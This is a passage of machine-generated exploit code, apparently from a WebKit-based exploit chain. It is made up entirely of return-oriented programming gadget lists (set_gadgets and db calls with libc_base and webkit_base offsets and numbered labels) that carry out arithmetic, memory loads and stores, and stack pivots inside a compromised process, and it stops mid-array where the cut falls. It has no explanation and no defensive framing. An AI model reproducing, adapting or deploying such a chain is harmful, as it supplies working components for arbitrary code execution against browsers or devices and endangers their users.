set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+202288, //L3384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+202272, //L3382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3382:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3384:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+202432, //L3387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+202400, //L3385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+202416, //L3386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3385:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3386:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3387:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+202512, //L3388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3388:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3390:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+202632, //L3393
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+202616, //L3391
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3391:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3393:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+202776, //L3396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+202744, //L3394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+202760, //L3395
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3394:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3395:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3396:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+202848, //L3398
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3398:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+202904, //L3399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3399:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+202984, //L3401
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3401:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3403:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+203104, //L3406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+203088, //L3404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3404:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3406:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+203264, //L3410
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+203216, //L3407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+203232, //L3408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3407:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3408:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3409:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L3410:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+203320, //L3411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3411:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3413:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+853989, //mov rax, rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+203448, //L3415
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3415:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+203504, //L3416
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3416:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+203648, //L3419
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+203664, //L3420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+203632, //L3418
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3418:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3419:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3420:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+203824, //L3424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+203792, //L3422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+203808, //L3423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3421:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3422:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3423:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3424:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+203880, //L3426
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3426:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+204008, //L3428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+204024, //L3429
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+203992, //L3427
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3427:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3428:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3429:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+204184, //L3433
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+204152, //L3431
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+204168, //L3432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3430:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3431:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3432:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3433:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+204240, //L3435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3435:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+204368, //L3437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+204384, //L3438
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+204352, //L3436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3436:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3437:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3438:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+204544, //L3442
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+204512, //L3440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+204528, //L3441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3439:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3440:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3441:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3442:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+204600, //L3444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3444:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+204728, //L3446
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+204744, //L3447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+204712, //L3445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3445:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3446:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3447:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+204824, //L3448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+204840, //L3449
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3448:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3449:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+204936, //L3451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+204920, //L3450
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3450:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3451:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+205016, //L3452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3452:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3454:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+205136, //L3457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+205120, //L3455
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3455:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3457:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+205216, //L3459
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+205248, //L3461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3459:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L3460:
ropchain+205376, //L3458
libc_base+144605 //pop rdi
]);
//L3461:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+205352, //L3463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+205368, //L3462
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3463:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3462:
db([0, 0]); // 0x0
//L3458:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+205440, //L3464
//L3347:
libc_base+782311, //pop rsp
ropchain+205456, //L3465
//L3464:
libc_base+782311, //pop rsp
ropchain+200688, //L3340
//L3465:
libc_base+764760, //pop rsi
ropchain+205496, //L3466
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3466:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3468:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+205616, //L3471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+205600, //L3469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3469:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3471:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+205792, //L3474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+205808, //L3475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+205760, //L3472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+205776, //L3473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3472:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3473:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3474:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3475:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+205904, //L3477
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+205888, //L3476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3476:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3477:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3478:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3479:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L3480:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+206104, //L3482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3482:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+206160, //L3483
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3483:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+206296, //L3487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+206280, //L3486
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3485:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3486:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3487:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+206432, //L3490
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+206464, //L3492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+206416, //L3489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3489:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3490:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3491:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3492:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+206576, //L3493+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+206568, //L3493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3493:
db([0, 0]); // 0x0
set_gadgets([
ropchain+206592, //L3493+24
ropchain+210392, //L3488
//L3494:
libc_base+764760, //pop rsi
ropchain+206632, //L3495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3495:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3497:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+206752, //L3500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+206736, //L3498
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3498:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3500:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+206896, //L3503
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+206864, //L3501
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+206880, //L3502
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3501:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3502:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3503:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+206976, //L3504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3504:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3506:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+207096, //L3509
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+207080, //L3507
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3507:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3509:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+207208, //L3510
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+207240, //L3512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+207224, //L3511
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3510:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3511:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3512:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+207360, //L3513
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3513:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3515:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+207480, //L3518
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+207464, //L3516
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3516:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3518:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+207656, //L3521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+207672, //L3522
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+207624, //L3519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+207640, //L3520
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3519:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3520:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3521:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3522:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+207832, //L3526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+207800, //L3524
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+207816, //L3525
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3523:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3524:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3525:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3526:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+207920, //L3527
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+207936, //L3528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3527:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3528:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+208112, //L3530
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+208128, //L3531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+208096, //L3529
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3529:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3530:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3531:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+208240, //L3533
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+208288, //L3536
